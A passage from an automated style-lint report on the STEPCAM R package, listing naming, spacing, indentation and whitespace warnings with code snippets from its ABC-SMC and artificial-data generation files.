^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L205) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:208:19:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:19:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:210:19:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:14:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:213:18:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:17:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:17:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:17:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:219:24:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L219) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] <- 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:24:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] <-\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:13:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:225:9:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:225:27:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:226:13:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L226) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:226:14:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L226) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:226:34:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L226) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:233:21:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L233) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:233:22:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L233) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:235:13:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L235) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:235:38:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L235) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:255:54:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:258:64:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L258) *style:* **Trailing whitespace is superfluous.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \n                                                               ^\n```\n[R/ABC_SMC.R:259:33:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L259) *style:* **Variable and function names should be all lowercase.**\n```r\n​        \"\\t\", \"accept rate = \", numberAccepted / (tried-1), \"\\n\")\n                                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:259:56:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L259) *style:* **Put spaces around all infix operators.**\n```r\n​        \"\\t\", \"accept rate = \", numberAccepted / (tried-1), \"\\n\")\n                                                      ~^~\n```\n[R/ABC_SMC.R:262:27:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L262) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:262:27:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:263:20:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:264:20:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:265:20:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L265) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:275:61:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L275) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:279:40:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L279) *style:* **Trailing whitespace is superfluous.**\n```r\n​           \"Can't stop at iteration 1 - \n                                       ^\n```\n[R/ABC_SMC.R:280:57:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L280) *style:* **Trailing whitespace is superfluous.**\n```r\n​           please set stop_at_iteration to 2 if you only \n                                                        ^\n```\n[R/generateArtificialData.R:5:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L5) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:10:23:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:12:21:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:12:47:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:12:49:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L12) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:12:64:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:50:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:13:58:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:14:37:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:14:54:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:12:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L17) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:18:22:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L18) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:14:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L20) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:20:25:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:12:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:22:19:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:22:37:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L22) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:22:40:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:17:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:25:63:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n                                                             ~^~\n```\n[R/generateArtificialData.R:25:65:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n                                                                ^\n```\n[R/generateArtificialData.R:26:24:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:27:31:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:29:26:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L29) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:29:43:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L29) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:29:58:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L29) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n^\n```\n[R/generateArtificialData.R:31:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                            (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:32:19:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:32:25:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                       ~^~\n```\n[R/generateArtificialData.R:32:53:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                   ~^~\n```\n[R/generateArtificialData.R:32:61:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:34:25:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                       ~^~~\n```\n[R/generateArtificialData.R:34:34:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L34) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                                 ^\n```\n[R/generateArtificialData.R:34:61:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                                                           ~^~\n```\n[R/generateArtificialData.R:34:68:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L34) *style:* **Trailing whitespace is superfluous.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                                                                   ^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities) {\n^\n```\n[R/generateArtificialData.R:35:37:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L35) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t                            (sd_richness * pool_richness) +\n                                    ^\n```\n[R/generateArtificialData.R:35:50:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\t                            (sd_richness * pool_richness) +\n                                                ~^~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == TRUE){\n^\n```\n[R/generateArtificialData.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:37:47:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:37:65:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:38:47:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L38) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/generateArtificialData.R:39:12:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L39) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities) {\n           ^\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:40:13:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L40) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == TRUE){\n            